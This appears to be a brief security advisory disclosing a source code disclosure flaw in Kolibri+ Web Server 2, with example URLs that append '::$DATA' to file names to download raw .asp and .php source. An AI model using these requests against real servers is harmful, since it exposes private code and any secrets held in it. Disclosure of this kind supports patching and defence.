Kolibri+ Web Server 2 suffers from an arbitrary source code disclosure vulnerability.
b9fb89e9b9efd9c89769ca3ddd8d6a93d0896da3824ea547fc56ec995c1a6bc9
#################################################################################
# #
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #
# aka: More fun with Kolibri+ 2 webserver #
# Found By: Dr_IDE #
# Tested On: Windows XPSP3 #
# #
#################################################################################
- Description -
Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
the application available.
This vulnerability is similar to the one reported earlier by Skull-HacKeR.
Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
(download in this case) by the following means.
- Technical Details -
https://[ webserver IP]/[ file ][::$DATA]
https://172.16.2.101/default.asp::$DATA
https://172.16.2.101/index.php::$DATA